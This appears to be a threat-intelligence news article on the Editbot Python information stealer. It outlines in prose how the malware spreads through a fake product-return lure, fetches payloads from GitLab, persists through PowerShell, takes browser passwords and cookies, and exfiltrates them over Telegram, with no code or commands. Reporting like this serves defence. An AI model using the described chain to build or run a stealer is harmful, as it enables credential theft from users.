A new threat has appeared on the dark web: the Editbot thief. Recently discovered by Cyble Research and Intelligence Labs (CRIL), this Python-based information stealer poses a significant risk to sensitive data of social media users.
Initially detected in a WinRAR archive file on VirusTotal, the Editbot thief exhibited minimal detection rates, prompting CRIL to perform further analysis.
What unfolded was a meticulously designed, multi-stage attack aimed at evading detection, downloading additional payloads, and establishing persistence on the victim’s system.
Editbot Stealer: the new information thief on the Dark Web
The campaign orchestrated by threat actors (TAs) involves exploiting open source code sharing platforms like Gitlab to harvest payloads for subsequent steps. The downloaded payload, a Python-based stealer, is capable of stealing critical information such as passwords, cookies, and web data. To complete its malware, the Editbot thief uses a Telegram channel to transmit the stolen data to the TAs.
Cyble Research and Intelligence Laboratories (CRIL) The December 5 investigation uncovered a potentially malicious RAR file on VirusTotal, leading to a quick review as similar files surfaced within a short period of time. Identified archive file is linked to a misleading file social media scam targeting users with the principle of “defective product to return”. TAs leverage the appeal of popular products to entice users to interact with misleading pages, thereby expanding their reach through user engagement.
The Editbot thief uses a multi-stage infection strategy, using a first-stage malicious batch file named “Screenshot Product Photo Sample.bat” and a JSON file named “manifest.json”. Using PowerShell commands, TAs ensure persistence by downloading and running the Python-based thief during each login session.
Features and capabilities of Editbot Stealer
Technical analysis of the Editbot thief reveals an element of malware. Python script “libb1.py” lists running processes, extract sensitive information from various web browsers and transmits the data to a specified Telegram channel.
During execution, the thief captures running processes and extracts sensitive information from browsers such as Chrome, Firefox, Edge, Opera, Brave-Browser, CocCoc and Chromium. It meticulously retrieves files such as cookies, login data, web data and local state, saving them in a designated directory in the %temp% folder.
The Editbot thief goes further by cracking passwords and saving login information, URLs and decrypted passwords in a text file named “pass.txt”. It also crawls the SQLite “Cookies” database file, extracting cookie information and storing the details in “cookie.txt” if associated with a social media site.
Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only and users take full responsibility for their reliance on it. The Cyber Express assumes no responsibility for the accuracy or consequences of the use of this information.